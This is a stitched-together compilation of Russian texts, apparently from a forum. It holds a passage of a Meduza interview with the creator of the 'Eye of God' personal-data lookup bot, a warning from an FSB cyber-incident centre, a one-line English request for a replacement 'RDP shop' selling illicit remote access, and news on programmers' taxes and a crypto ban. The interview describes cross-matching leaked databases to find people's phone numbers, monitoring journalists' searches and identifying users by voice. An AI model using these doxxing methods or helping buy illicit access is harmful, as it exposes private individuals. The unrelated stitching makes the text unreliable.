Историю о связанных с BadBank людях, которые — в описании Антипова — приходили к нему с предложением «решить проблемы», Врублевский рассказывает по-другому: «Никто никому ничего не предлагал „решать“ — ситуация была другая. Кто-то из энтузиастов канала BadBank — там их множество на самом деле — приватно проанализировали 152-ФЗ о персданных — и нашли определенный ряд рекомендаций для „Глаза Бога“, как работать правильно. „Глаз“ их поначалу отринул, но потом кто-то Антипова арестовал на два дня — причем до сих пор непонятно, кто и зачем — и он резко попытался исполнить рекомендации, которые были ему даны. Но вскоре после ареста все эти идеи все равно ушли в топку».Click to expand...
— Ваш проект не первый, который блокируют за нарушение закона о персональных данных: до того Telegram по требованию РКН«отключал» боты «Архангел», Smart_SearchBot, mailsearch bot. Чем закончится вся эта война, как вы считаете?
— Меня это никак не коснется, потому что я уже занимаюсь следующими проектами. А вообще ото всех отстанут, я думаю. Обратите внимание, что гоняли всех очень резонансно, но ни об одном уголовном деле так и не было объявлено. Не было же такого по телевизору? И вот когда это все наконец случится — и этот политический заказ пройдет, от всех и отстанут. Нет смысла бесконечно мучить рынок. Тем более что сейчас видно, что это удары вслепую: «Химера», «Архангел» — совершенно безобидные боты.
— Кто-то из тех, кто попал под удар, пытается «легализоваться»?
— Насколько я знаю, нет. [Бот для «пробива»] AVinfo, как знаю от общих друзей, вообще собирается уходить в работу по проверке юрлиц: не справляется [с переменами]. Они не были готовы — у них не было ни канала, ни сайта, — и когда их бот удалили, люди его просто потеряли. И они не смогли вернуть даже 70% аудитории.
— Что думают на рынке про версию, что это все просто инстинктивная реакция системы на расследование Bellingcat об отравлении Навального?
— Если говорить не только о телеграм-ботах, а о рынке «пробива» в целом, то да: повлиял Навальный, который в своем видео сказал, что русские спецслужбы сами сливают паспорта и билеты. И тогда по этой теме началась проверка.
Я когда сидел [на допросе] в СК, мне рассказали: «Женек, понимаешь, какая ситуация — нас однажды генерал всех созывает и показывает „Глаз Бога“: „Смотрите — видите, моя почта?“ Видим. „Там указан слитый пароль Sasha320 — это мой пароль. Посадите Антипова. Он меня взломал только что“».
— Вас вообще силовики спрашивали когда-нибудь, как можно из данных «пробива» собрать такую историю, идентифицировать столько военных химиков и сотрудников спецслужб?
— Никогда. Они как Воландеморта боятся этой истории.
— То есть люди из команды отравителей — это Люди-которых-нельзя-называть?
— Да, эту тему никогда реально не затрагивали.
— Вы в интервью Forbes[упоминали](https://www.forbes.ru/karera-i-svoy- biznes/432271-za-glazom-boga-kto-sozdal-glavnyy-v-rossii-servis-dlya- poiska), что благодаря данным о поисковых запросах пользователей бота знаете, кто расследовал отравление Навального.
— Они же показали номер эфэсбэшника в том видео на ютьюбе — и все стали его у нас пробивать. Тысяч семь пробили. Но мы можем взять телефон этого человека — и увидеть в боте, кто его искал в течение месяца накануне публикации видео. Это и окажутся люди, связанные с расследованием. Но мы так установили только левые аккаунты — там люди не дурачки, с аватарками не сидят.
— Вы правда, как это[пишет](https://www.forbes.ru/karera-i-svoy- biznes/432271-za-glazom-boga-kto-sozdal-glavnyy-v-rossii-servis-dlya- poiska)Forbes, в специальной презентации «Глаза Бога» для госсектора продемонстрировали эти результаты и заявили, что готовы содействовать в борьбе с иностранцами?
— Нет, такого не было, тут у них неточность (в том варианте презентации «Экосистемы решений анализа и визуализации больших данных», который Антипов передал «Медузе», действительно не упоминается такой проект, — прим. «Медузы»). Вообще, достаточно глупо идти к государству с новостями «а я знаю, кто искал отравителей Навального!» Они и без меня это знают.
— Но доступ к поиску в «Глазе» для иностранных граждан вы же зачем- то[запретили](https://www.forbes.ru/karera-i-svoy-biznes/432271-za- glazom-boga-kto-sozdal-glavnyy-v-rossii-servis-dlya-poiska)?
— Есть статья о шпионаже — меня к ней могли сильнее всего привязать. Самое страшное — это не когда русский пробивает русского, а если иностранец находит в боте [данные] русского полицейского — на меня в такой ситуации можно повесить шпионаж и госизмену.
— Вы пытались как-то анализировать данные логов — кто и зачем обращается к сервису?
— Это секретная функция «Глаза Бога»: у меня гораздо больше данных, чем кажется. Наша нейросеть сканирует [пользовательские запросы], а потом ее работу вручную проверяют модераторы.
Мы так даже попробовали разделить всех [обращающихся к боту] силовиков на ФСБ и МВД — просто интересно было, отличаются они чем-то или нет. Ищут ли эфэсбэшники каких-то особенно секретных людей, которых не ищут эмвэдэшники? Оказалось, ничего сверхсекретного не ищут. А все эмвэдэшники вообще активно пробивают девушек из метро — ну, снимают тайком и кидают в бот. Очень мало серьезных [рабочих] запросов и очень много личных.
Мы брали на монитор эскортниц. Эти самые конкретные: они ищут своих клиентов. А их клиенты — депутаты — ищут других таких девушек. Иногда прямо видно, как сначала депутат пробивает какую-то девушку, дальше она начинает искать пять- шесть депутатов, а потом [о романе] кому-то рассказали — и на этот поиск уже садятся журналисты.
Или журналисты. Мы раздали им подписки, чтобы они подсели на «Глаз Бога» — и поставили все их запросы на монитор. И теперь можно смотреть, кто какие запросы сейчас делает: о ком ищут информацию. Часто это значит, что человек что-то наворотил — и завтра о нем напишут.
— А расследования правоохранительных органов можете предсказывать? К кому завтра придут с обыском?
— Да. С помощью этой системы можно даже увидеть, кого сейчас силовики расследуют.
—Было еще что-то, что задумывали для бота, но не успели реализовать?
— Одну функцию я начал развивать, но отвлекся. У нас в бот можно скидывать голосовые сообщения — например, наговорить боту номер машины, которую увидел в дороге. И мы идентифицировали все эти голоса. И я могу поднести [к звучащей речи] смартфон, с помощью бота все записать — и мне высветится ваш телеграм- аккаунт.
— Почему вы в какой-то момент решили стать публичным лицом «Глаза Бога», который изначально был анонимным проектом?
— Когда понял, что «Глаз Бога» как бренд легко убить — и мне ничего не останется, ни одного упоминания, кто и что реально делал в проекте. Меня многие отговаривали, но я решил выйти [вперед], чтобы хоть немного засветить свою фамилию. И если я сейчас создам следующий проект, у него уже будет чуть более легкий и быстрый старт.
— После мартовской блокировки «Глаза Бога» выобъявили, что теперь будете предоставлять услуги только тем, кому закон разрешает работать с такими данными. Как это устроено?
— Мы ввели идентификацию [пользователей по номеру телефона], чтобы клиенты не были просто анонимами из телеграма. Получается, мы регистрируем человека — и он это все подписывает электронным договором.
Также «Глаз Бога», как [писал](https://www.forbes.ru/karera-i-svoy- biznes/432271-za-glazom-boga-kto-sozdal-glavnyy-v-rossii-servis-dlya-poiska) Forbes, запретил доступ к поиску иностранным гражданам, предоставил возможность людям удалить информацию о себе из базы данных бота и перенес часть серверов из Белоруссии в Россию.
— При этом эксперты до сих пор[убеждены](https://www.forbes.ru/karera- i-svoy-biznes/432271-za-glazom-boga-kto-sozdal-glavnyy-v-rossii-servis-dlya- poiska), что в боте используются в том числе слитые базы данных; предоставление такой информации конечному пользователю нарушает закон.
— У нас больше нет таких данных. Не буду врать: в начале 2020 года я понял, что нельзя просто так скачивать базы из интернета, и пошел на хитрость: перевел их все на первый попавшийся свободный домен, который зарегистрировал на британскую компанию — и стал покупать их сам у себя. Там были обычные дырявые старые базы, которые валяются на форумах и которые вы почему-то считаете запрещенными.
Но сейчас я так уже не работаю: сейчас каждая строчка данных в боте собирается или парсингом [открытых источников], или из специальных сервисов типа [агрегатора баз данных для проверки контрагентов] «Солярис». Я за каждую строчку могу ответить.
— Как у вас тогда в боте оказываются номера мобильных или адреса? Такой информации[не бывает](https://www.forbes.ru/karera-i-svoy- biznes/432271-za-glazom-boga-kto-sozdal-glavnyy-v-rossii-servis-dlya- poiska)в «белых» базах или государственных информационных системах.
— Мы как поисковая система только осуществляем очень сложные поисковые запросы. Например, утекала база ГИБДД. Мы дополнительно к ней скачали всю базу «Российского союза автостраховщиков», в которой указаны имя, отчество, одна буква фамилии, дата рождения и номер машины. По номеру машины узнаем регион — а дальше во «ВКонтакте» и утечках оттуда находим и страничку нужного человека, и его телефон.
Давайте возьмем ваш телефон, пробьем его в боте — и я про каждую строку выдачи скажу вам, откуда она. Так, вот у вас возможные имена из GetContact. По вашим почтам — а они, вероятнее всего, найдены из «ВКонтакте» — на сайте Facebook можно найти ваш аккаунт.
— А еще бот видит мой логин в Skype, все мои имейлы и даже «слитые пароли» к ним — парсингом такое не достанешь.
— Ну, ваш телефон можно вбить в «Яндекс», и то же самое будет. Пожалуйста — нашел объявление на форуме, где вы оставляли почту. Сейчас найдем «ВКонтакте» ваш таким же путем. А у Skype вообще интересно: у компании есть сайт, где можно вбить чей-то телефон — и найти логин. По [слитым] паролям мы никакие базы не покупаем — мы пользуемся сервисом leakcheck.io. Это, кстати, единственный бот, которого РКН разблокировал обратно.
— Ваши конкуренты на рынке торговли данными[говорили](https://www.forbes.ru/karera-i-svoy-biznes/432271-za- glazom-boga-kto-sozdal-glavnyy-v-rossii-servis-dlya-poiska) журналу Forbes, что у вас одно время даже телефонный биллинг можно было купить.
— Я бы никогда в жизни такое не подключил: во-первых, это незаконно, а во- вторых, биллинг стоит тысяч 40 [рублей]. Если бы я начал таким торговать, подписчики просто спросили бы: «Ты дурачок?» Кто будет это покупать в боте, где кнопка «подписка» стоит 250 рублей? Просто взять и поставить рядом кнопку «биллинг» — за 40 тысяч?
Маркетинговые материалы проекта «Глаз Бога»
Предоставлено Евгением Антиповым
— У вассайтсейчас выглядит
достаточно респектабельно — как будто вы совершенно не скандальное решение для
бизнеса. Так и задумано?
— У меня изначально и был план не продавать все это в розницу, а сделать механизмы сбора данных — и продавать бизнесу уже целые большие красивые массивы. Мне недавно писало маркетинговое агентство «Лукойла», еще в ноябре [2020 года] мне писали из ТАСС, из банков, из «Яндекс.Автобусы» — почта на самом деле завалена письмами. (Антипов предоставил «Медузе» скриншоты имейлов с деловыми предложениям этих компаний — письма от «Яндекса» среди них нет, но есть сообщение от бывшего сотрудника компании, — прим. «Медузы».) Они, видимо, находят сам продукт, но не следят за новостями — хорошо там у нас дела [с РКН], плохо. Все спрашивают одно и то же: есть ли документация для подключения: «Есть ли у вас API? А то вы говорите, что есть big data — мы готовы интегрироваться». Но я еще ни одно из этих предложений не принял.
«Яндекс никогда не сотрудничал и не стал бы сотрудничать ни с самим сервисом „Глаз Бога“, ни с каким-либо из аналогов. Покупка персональных данных нарушает принципы компании, — сказали „Медузе“ в компании. — Мы закрыли сервис „Яндекс.Автобусы“ в январе 2019 года, задолго до создания сервиса „Глаз Бога“. Сотрудник, о котором идет речь, сам указывает, что является экс-сотрудником „Яндекса“ и выступает от другой компании». «Лукойл» и ТАСС не ответили на запросы «Медузы» к моменту публикации этого интервью.
Click to expand...
— Зачем ваш сервис мог бы понадобиться, например, «Лукойлу»?
— У них же карточки [лояльности] есть — то есть собрана база телефонов клиентов. И им нужно связать эти номера со страничками соцсетей — проводить рассылки, устраивать акции. Я могу выдать не просто страничку «ВКонтакте», а специальный идентификатор, по которому внутри соцсети можно делать рассылку.
— Ваши юристы намерены доказывать РКН или Telegram, что «Глаз Бога» не нарушает закон?
— Нам нужно просто отобрать канал обратно — он нам нужен для сильного запуска нового продукта. Хотели выступить в духе «вот какие мы молодцы, уходим из серого поискового процесса в более „белый“, серьезный, для бизнеса» — но нас лишили воздуха, сломав канал.
У меня есть идея [сервиса для мониторинга] социального рейтинга — такой аналог сразу и «СПАРК-Интерфакс» для проверки юрлиц, и «Кро-Информ» для проверки физлиц. Система нам сканирует все соцсети, все сайты с рейтингами и оценками. Вводим имя вашего сотрудника, нажимаем «мониторить» — и узнаем, висят ли на нем штрафы. Или вводим имя няньки вашего ребенка — и по всем соцсетям видим, не сидит ли она в группах 18+ или других плохих. И система будет мониторить нужного человека постоянно.
Так же, как с машинами — мы же всегда проверяем перед покупкой, висят ли на ней штрафы, попадала ли она в аварии, была ли в залоге, битая или нет. Здесь абсолютно то же самое.
— От бота не начали отписываться, когда вы ввели аутентификацию по номеру телефона? Ведь если последовательно соблюдать закон, то придется и с правоохранительными органами этой информацией делиться — по запросу.
— Вообще не было оттока: людям в целом все равно оказалось. Мне предъявляли, что «вот, ты берешь телефоны, будешь кому-то данные сливать». Кому интересны эти ваши данные? Мои клиенты — это люди, которые проверяют звонки с незнакомых номеров или, заскучав в пробке, ищут контакты понравившейся девушки, [загрузив ее фотографию в «Глаз Бога»]. Этим людям разве должно быть страшно?
— Неужели Роскомнадзор не выставил никаких требований по отчетности перед МВД и ФСБ?
— Нет. А силовики мне сами сказали, что, если понадобится, запрос они будут делать не ко мне, а к Telegram: «И они нам должны будут предоставить переписку твоего клиента с ботом». После обыска [в апреле 2021 года] меня отвезли на разговор в Следственный комитет. И я услышал там от их сотрудников, которые в праве шарят: «Когда нужно узнать, кто кого ищет в боте, мы запрашиваем не вас, а Telegram: у нас к ним больше доверия. Вы-то можете что- то подмешать к ответу на запрос, загрязнить данные — а они так не будут делать: там люди с репутацией сидят. В Telegram мы возьмем все, что нужно, от и до».
— Обыски у вас прошли вскоре после массового удаления из Telegram ботов по «пробиву» — это была одна и та же кампания?
— Апрельский обыск оказался никак не связан с ботом. Когда они нашли на компьютере чат «Глаза Бога», спросили: «Что, в боте сидишь, закон нарушаешь?» Я подумал, что подкалывают. Но пока меня не привезли в СК, никто из оперативников так и не поверил, что бот — мой.
Потом я всем подписки раздавал в здании СК — бесплатный доступ. Всем, с кем один на один общался. Когда разговор завязывался, спрашивали: «А что, правда ищет хорошо? Дай посмотреть». Я и показывал. Я и так делюсь с органами: когда они мне пишут со своей служебной почты [с такой просьбой], мы предоставляем [бесплатный доступ].
Интервью Федора Сироша, адвоката Антипова, в день обыска. 8 апреля 2021 года
NnYourTime
— И часто так общаетесь с силовиками?
— Вообще разговоров много было — и на неофициальных встречах, и даже во время обысков. У меня ведь и до [появления] «Глаза» были обыски — всего три, получается. Когда общаюсь с ними, все с уважением относятся — все видят, что я делаю. У меня нет секретов: я максимально открыт. Если идет диалог, я не буду молчать — так себя разрекламирую, что меня еще и на работу позовут.
— А что за «неофициальные встречи» с силовиками?
— В публичном месте могут подойти и сесть рядом. Таких историй полно: когда я вышел с интервью у Baza, то сел в кафе в «Рэдиcсоне» рядом — и прямо там сидели сотрудники, которых я видел на обыске. И так всегда.
— Это такая странная наружка?
— Я не спрашивал, как они там оказались.
— Вас после обыска отпустили со всей техникой — это большая редкость. На рынке торговли данными после этого не заговорили, что вы начали сотрудничать?
— Многие писали тогда в чат в духе: «Отпустили с обыска и даже не заблокировали — все, доверия больше нет». Я никогда не понимал таких людей и так им и отвечал: «А мне в целом не плевать ли на вас? Если мне нужно будет рассказать, как кто-то из вас нарушает закон, убивает людей, отыскав их в моем боте, я это сделаю. Моя цель — делать продукт полезный, а не скрывать ваши преступления и получать за это по шее».
— После обыска вырассказалиBaza, что сервис сделал невозможным «пробив» сотрудников МВД и ФСБ. А как это технически возможно? API передали ФСБ?
— Меня тогда неправильно поняли. Мы просто стали скрывать слова «ФСБ» и «МВД» в выдаче облака тегов, которые бот берет из GetContact. Например, вы знаете личный номер «Иванова Ивана Ивановича из ФСБ города Москвы» — если вы начнете проверять номер через мой бот, то в разделе «возможные имена» слово «ФСБ» будет скрыто. И GetContact с NumВuster! тоже это теперь скрывают.
— Этим ограничилось? Вам же настолько же легко замониторить, как журналист ищет в боте какого-нибудь отравителя или коррупционера, и предупредить кого надо о готовящемся расследовании.
— Мне кажется, так можно продавить любой серьезный бизнес. Если власть потребует, «узнаешь о расследовании против наших — отзвонись», ей никто не откажет в этом. Но ко мне таких требований не было.
— Два собеседника из сферы «пробива» рассказали «Медузе», что после апрельского обыска и начала давления на «Глаз Бога» «очень круто колыхнуло рынок» и «позашкварились сервисы» и игроки серого рынка данных, которые с вами сотрудничали — якобы потому, что данные о ваших партнерах попали к силовикам.
— Если мне предъявляют за слив коллег и партнеров, могу только сказать, что все эти люди сидят с VPN и с левого аккаунта — как раз чтобы не допускать ситуаций, когда «приходят к Васе Пупкину и узнают мои данные». Но в целом странно за такое обвинять: я же живу открыто, не скрываюсь, у меня дом танками не окружен. Если бы ко мне пришли домой с паяльником и потребовали всех слить, то, наверное, все бы забрали. Если бы было что забирать.
— Один из собеседников, близкий к рынку торговли данными, рассказывает, что у вас едва ли не несколько десятков благодарственных грамот от разных силовых структур…
— Да, первая была получена в 2016 году, когда я создал что-то вроде быстрого логгера для сотрудников ФСКН. Были консультации, были грамоты — правда, на них нет никаких QR-кодов, поэтому, как по мне, это мусор. А вот когда занимался криптовалютой и чуть позже «Глазом», то получал бумажные [грамоты] уже чисто для себя: приятно было оставить какой-то след, к тому же это бумаги, с которыми в суде можно доказать, что ты не враг своей стране.
Я уже говорил, что бесплатно предоставляю доступ к «Глазу» силовикам. Но это только на месяц или три, а если попросят продлить, запрашиваю у них уже благодарственную грамоту на юрлицо.
— На рынке рассказывают, что вы в какой-то момент сделали ставку именно на свои знакомства среди силовиков, а не на последовательный комплаенс — и что хороших результатов это не дало.
— Не совсем. Это, наверное, оценка со стороны зрителя. Просто в какой-то момент посыпалось сразу все: мне нужно было держать систему в рабочем состоянии, параллельно реагируя на вопросы силовиков и советы адвокатов. Возможно, я неправильно расставил приоритеты в этот момент, но окончательной ставки я не делал ни на силовиков, ни на «идеальную» легализацию: команду дорогих юристов, короче говоря, не нанимал. Делал как мог — и мне кажется, сделал все верно.
— Вы скинули мне презентацию, которая явно предназначена для продвижения вашего сервиса в госсекторе.
— Я всегда говорил, что не против делать проекты для власти — у меня даже был готов офигенный прототип для полиции. Берем полицейский планшет или просто смартфон, наводим его на поток машин — и прямо над ними загораются госномера и сведения про неоплаченную страховку или штрафы. По крайней мере iPhone X за секунду считывал полсотни машин. Мы все это сделали — просто не знаем, куда отнести, чтобы людям это официально дать.
— Вы в итоге о чем-то договорились?
— Я так и не понял, как мне с ними [силовыми структурами] взаимодействовать, кому писать — они все какие-то балаболы, вот без обид.
Просто создать, например, инструмент, определяющий IP-адрес, или сниффер какой-то для, так скажем, узкого круга — да, получалось, и эти продукты помогали. Но официальное сотрудничество наладить не получилось ни разу. Все заканчивалось тем, что мне присылали бумаги какого-то тендера — мол, «хочешь такое взять?» — а там написан такой бред непонятный! То ли «на отвали» писали техническое задание, то ли я слишком глуп.
— Вы говорите, что обыска у вас было уже три — с чем были связаны первые два?
— С криптовалютой. У меня ее было много, я даже делал свою биржу — и был связан с крупными и очень известными криптокошельками. По сути просто менял битки на рубли в криптовалютных обменниках — в частности, на 24paybank.net. Сдавал биткоины, а себе на карту «Сбербанка» получал рубли. И мне каждый раз так «везло», что это оказывались не просто рубли, а наркоденьги.
Как это происходило: полиция делала контрзакупку — приносила 10 тысяч рублей на одну из площадок [в даркнете] и покупала наркотики. И вот я прихожу в обменник со своими битками — и в тот же момент там объявляется этот наркомагазин с «полицейскими» рублями. И я их забираю себе, не зная о происхождении денег, а им отдаю биткоины.
Так я оказываюсь конечным лицом, которое на свою карту получает эту сумму. Наши органы это установили, но потом приписали мне вообще все деньги из этого обменника — чуть ли не три-четыре миллиона долларов. У меня был обыск сначала московской, потом ставропольской, потом снова московской полиции.
— А в апреле почему к вам домой пришли? Пресс-секретарь вашего проекта Сергей Каленикговорил, что следственные действия тогда были связаны не с «Глазом Бога», а с запрещенным форумом финансовых мошенников DarkMoney, к которому вы «каким-то непонятным образом имели отношение».
— В апреле мне дверь вынесли за секунду: спецназ с автоматами, на допрос везли на 15 машинах, в кабинете было человек 40, в наручниках я просидел часов 20. [В постановлении об обыске] было указано очень много статей — и похищение, и кража, и «организация преступного сообщества», и причинение вреда здоровью.
Меня «назначили» администратором форума DarkMoney — всего вот этого даркнетовского, где заказные убийства, обнал, пробивы, наркотики. Но пришли по поводу какого-то одного конкретного похищения, связанного с форумом. Короче говоря, я обвинялся в том, что организовал преступный сговор, собрал толпу людей, мы кого-то похитили, побили и что-то у него отняли — там в документах была фамилия пострадавшего указана. А вообще раскручивать дело хотели до конца — что я единственный владелец DarkMoney и много чего еще.
— Как вас вообще связали с форумом?
— Доказательств у них толком никаких не было — меня же сразу отпустили, технику вернули, сделали свидетелем. Не притягивался я никак. Я занимался биткоин-кошельками, а многие текущие владельцы черных форумов — это мои бывшие партнеры. Но я-то сейчас максимально на свету: большие цифры, машина хорошая, много недвижимости — и все это растет и растет. Может быть, поэтому и была проверка.
В документах, которые мне показывали, была реально страница форума — и квадратиками обведены ники. И меня, тыкая в имена ручкой, спрашивали, кого я отсюда знаю. Я узнал только двух-трех — это были люди, которым я когда-то предлагал сделать свой мессенджер, аналог Telegram.
— Вы еще в школесталипрограммировать: журнал Forbes[уточнял](https://www.forbes.ru/karera-i-svoy- biznes/432271-za-glazom-boga-kto-sozdal-glavnyy-v-rossii-servis-dlya- poiska), что начали с вирусов, потом перешли на софт для организации маркетинговых и финансовых пирамид, а к 2016-му занялись пирамидой уже криптовалютной. Люди из какого периода вашей жизни так заинтересовали силовиков?
— Это актуальные люди: не прошлое, а настоящее. Мы общались по нескольким проектам. Когда только стала популярна криптовалюта, везде стали появляться юные маленькие миллионеры — дети, у которых было до хрена денег, чтобы тратить налево и направо. Я [под такую аудиторию] придумал приложение типа Uber, через которое можно вызвать себе личную охрану — и чтобы это было прям красиво. Собрал этот сервис — и попросил ребят, чьи ники засветились [в документах следствия], свести меня с ЧОПом. Просто эти мои знакомые были из якобы детективного агентства [DaVinci], а я в этой сфере никого не знал.
И еще, как я уже говорил, была идея сделать свой мессенджер, который не был бы привязан к телефону или почте, а только к конкретному смартфону. И я искал партнеров, которые смогли бы его продвигать.
Интерфейс приложения для вызова личной охраны
Архив Евгения Антипова
— Forbes[писал](https://www.forbes.ru/karera-i-svoy-biznes/432271-za-
glazom-boga-kto-sozdal-glavnyy-v-rossii-servis-dlya-poiska), что
«детективное агентство» DaVinci, на которое вы ссылаетесь, — это на самом деле
«банда из даркнета», которая с конца 2020
годаадминистрируеттот самый
форум darkmoney[.] И что вы с этой группой тесно связаны: даже аккаунт под
ником DaVinci на
DarkMoneyзаблокироваливсего через
несколько часов после обыска у вас.
— Да, DaVinci — это как раз одно из имен той штучки, по делу о которой ко мне приходили. Детективное агентство, которое может кого-то поискать, пробить, сфоткать. У них был аккаунт на [форуме] darkmoney[.] Изначально нас связали общие знакомые по бирже: DaVinci хотели сделать себе сайт — я помог. Бесплатно: «Жень, какие-то услуги будут нужны — скажешь». Потом они пропали, а через полгода снова написали: «Женя, не хочешь ли сделать мессенджер?» Ни фига мы его не сделали, конечно. А потом я сам попросил их помочь с ЧОПами для охранного агентства.
— То есть у вас было как минимум три совместных проекта? Еще Игорь Бедеров из компании «Интернет-розыск»[утверждает](https://www.forbes.ru/karera- i-svoy-biznes/432271-za-glazom-boga-kto-sozdal-glavnyy-v-rossii-servis-dlya- poiska), что «Глаз Бога» изначально продвигали на теневых форумах именно с аккаунта под ником DaVinci.
— Бедеров все время меня пытается связать с даркнетом: якобы я связан с DaVinci, а DaVinci связан с даркнетом и едва ли не с организацией заказных убийств. Но мы с ними после того случая [обыска] на связь не выходили.
А про «Глаз Бога» они [DaVinci], естественно, знали — и пользовались им. У них на форуме целая ветка была. Они мне забесплатно делали одолжения: размещали рекламу «Глаза Бога» на форуме в закрепленных ветках — где рекламные места покупаются.
— Благотворительность в даркнете — вы серьезно?
— Да это была просто маленькая маркетинговая хитрость с их стороны. Мы создали «Глаз» в январе, а рекламировать они его начали только летом — и получается, что у них тоже был собственный интерес: они его пиарили как «один из продуктов их команды» — типа я в их команде. Мол, вон они какие молодцы, делают такие офигенные продукты. Взаимная реклама такая.
Source: meduza.io/feature/2021/07/12/esli-nuzhno-budet-rasskazat-kak-kto-to- iz-vas-narushaet-zakon-ya-eto-sdelayu
Москва. 24 февраля. INTERFAX.RU - Созданный по приказу руководства ФСБ Национальный координационный центр по компьютерным инцидентам (НКЦКИ) предупредил об угрозе увеличения интенсивности компьютерных атак на российские информационные ресурсы, в том числе объекты критической информационной инфраструктуры (КИИ) на фоне проводимой военной операции на Украине.
"Атаки могут быть направлены на нарушение функционирования важных информационных ресурсов и сервисов, нанесение репутационного ущерба, в том числе в политических целях", - сообщает НКЦКИ.
"Кроме того, в дальнейшем возможно проведение вредоносных воздействий из российского информационного пространства для формирования негативного образа Российской Федерации в глазах мирового сообщества",- заявили в Центре.
Специалисты НКЦКИ рекомендуют российским организациям усилить бдительность при мониторинге вредоносной активности, направленной на объекты, находящиеся в зоне ответственности организации, организовать процесс приоритетной обработки информации об аномалиях, обнаруживаемых в работе объектов КИИ.
"Любой сбой в работе объектов КИИ по причине, не установленной достоверно, в первую очередь необходимо рассматривать как результат компьютерной атаки", - уточнили в Центре.
"В случае выявления признаков целенаправленных компьютерных атак незамедлительно информировать НКЦКИ для своевременной выработки мер противодействия", - добавили там.
One of the best RDP shops got
closed.Any
recommenadation for other shops with good quality
РСПП нашел способ, как заставить российских программистов регистрироваться в качестве самозанятых. Разработчики не спешат это делать, поскольку не хотят платить налоги, даже по льготной ставке, которая, к тому же, положена не каждому. Если их годовой доход превышает 2,4 млн руб., то отчислять государству придется стандартные 13%, а многие программисты способны зарабатывать намного больше. РСПП предлагает поднять этот лимит с 2,4 млн руб. до 5 млн руб. в год.
Программистов выведут из тени
Российский союз промышленников и предпринимателей (РСПП) придумал, как вывести из тени отечественных программистов, работающих из дома и не отчисляющих налоги в российскую казну. Как пишут «Известия», свои предложения РСПП изложил в докладе, подготовленном для Совета Федерации, Центробанка, Госдумы и Правительства.
Основная идея Союза заключается в повышении планки дохода для самозанятых айтишников с нынешних 2,4 млн руб. в год до 5 млн руб. в год. По мнению авторов доклада, это позволит увеличить число программистов, оформленных как самозанятые и выплачивающих налоги по льготной ставке.
«С учетом среднегодового темпа роста зарплат в 10%, увеличение порогового значения дохода, при котором возможно применение специального режима налогообложения для самозанятых, позволит увеличить число физических лиц <…>, ведущих деятельность в области ИТ в легальном поле, а также обеспечит рост налоговых отчислений от их деятельности», – говорится в докладе РСПП.
На момент публикации материала ни Центробанк, ни Госдума, ни Правительство доклад РСПП не получали. «Банк России изучит инициативы, как только они поступят на рассмотрение. В настоящее время регулятор формирует итоговую позицию по основным тенденциям развития экосистем с учетом предложений бизнес- сообщества, экспертов и профессиональных ассоциаций», – сообщил изданию представитель Центробанка.
Обоснование необходимости изменений
Российские самозанятые платят налоги в размере 6% при работе с юрлицами, а если клиентами являются физлица, то и вовсе 4% при стандартной налоговой ставке 13%. Однако это касается лишь ситуации, когда годовой доход самозанятых не превышает 2,4 млн руб.
В противном случае налоговая автоматически снимает такого специалиста с учета в качестве самозанятого. «Все последующие клиенты – юридические лица такого самозанятого будут обязаны удерживать НДФЛ, платить страховые взносы за него, а за получение вознаграждений от физических лиц он самостоятельно должен будет выплачивать НДФЛ», – сообщил изданию глава направления «Разрешение IT&IP- споров» юридической фирмы «Рустам Курмаев и партнеры» Ярослав Шицле.
По мнению вице-президента РСПП Сергея Мытенкова, поднять планку доходов для программистов, чтобы те начали регистрироваться в качестве самозанятых и делиться с государством своими деньгами, следует как минимум по двум причинам. Первая – почти полное отсутствие привязки к конкретному месту проживания или месту работы. «Зачастую контролировать уплату ими налогов просто некому», – прокомментировал этот момент Сергей Мытенков.
Вторая причина – это высокие заработки программистов. По словам Мытенкова, кодеры могут получать больше 200 тыс. руб. в месяц, а это намного больше в сравнении со многими другими самозанятыми.
В словах президента РСПП есть зерно истины, но тут все зависит от языка, на котором пишет программист. Востребованы или самые распространенные языки или, напротив, почти забытые, например, очень древний COBOL.
Программистам это невыгодно
Опрошенные «Известиями» эксперты в большинстве своем согласны, что возможность для программистов стать самозанятыми выгодна не только государству, которое будет получать больше налогов, но и сами айтишникам. В качестве примера они возможность взять ипотеку, что, впрочем, на фоне начавшегося роста ставок и слабости российской валюты, едва ли можно назвать преимуществом.
Кроме того, возможность зарабатывать сотни тысяч рублей в месяц позволяет «домашним» айтишникам скопить на жилье самостоятельно и не обращаться за помощью в финансовые организации.
По мнению экспертов, далеко не все программисты добровольно согласятся делиться с государством частью заработанных ими денег, которые они могли бы потратить сугубо на свои нужды. «Надо учитывать, что программисты зачастую не привязаны ни к одной налоговой юрисдикции. Они могут выполнять заказы без оформления каких-либо договорных отношений и не платить государству вообще ничего», – добавили они.
ИТ-отрасль поддержала инициативу
Предложение по выводу российских программистов из тени, озвученное РСПП, поддержали в ассоциации «Руссофт». По мнению президента организации Валентина Макарова, повышение уровня дохода для самозанятых кодеров действительно поспособствует росту числа тех, кто оформился официально.
«“Обеление” зарплат этим людям действительно необходимо, рано или поздно они начнут сталкиваться с претензиями налоговых органов. Гораздо продуктивнее было бы взимать с них небольшой налог и ввести их деятельность в правовое поле, – заявил Макаров «Известиям».
Нынешний годовой лимит зарплат самозанятых программистов действительно является серьезным препятствием, считает директор бизнес-юнита «Финтех» кадровой компании Unity Дмитрий Васильев. По его подсчетам, в России сейчас насчитывается около 3,5 млн самозанятых, но лишь не более 300 тыс. из них относятся к ИТ-сфере. Он привел в пример опытных разработчиков, чья годовая зарплата легко может превысить 3,5 млн руб.
Это уже намного выше нынешнего лимита в 2,4 млн. То есть даже если такой программист и попытается оформиться в качестве самозанятого, то льготной налоговой ставки ему все равно не видать.
Курс на запрет криптовалюты в России пролоббировала спецслужба, чтобы лишить
россиян возможности финансировать СМИ-иноагенты и оппозицию, рассказали
источники агентства Bloomberg
Глава Центробанка Эльвира Набиуллина согласилась поддержать курс на полный
запрет криптовалют в России под влиянием Федеральной службы безопасности,
сообщает Bloomberg со ссылкой на два осведомленных источника. По их словам,
спецслужбы продвигают идею полного запрета, чтобы исключить возможность
пожертвований для нежелательных организаций и СМИ, которых внесли в реестр
иностранных агентов.
В то же время агентство отмечает, что финансирование оппозиции и СМИ составляет незначительную долю активов, хранящихся примерно в 17 млн криптокошельков в России. Bloomberg оценивает общий объем криптовалют, которым владеют россияне, в 7 трлн руб., или $92 млрд. Но спецслужбы все равно считают финансирование оппозиции проблемой, масштаб которой увеличивается, пишет агентство.
РБК направил запрос в ЦБ. В ФСБ от комментариев Bloomberg отказались.
иточник:РБК
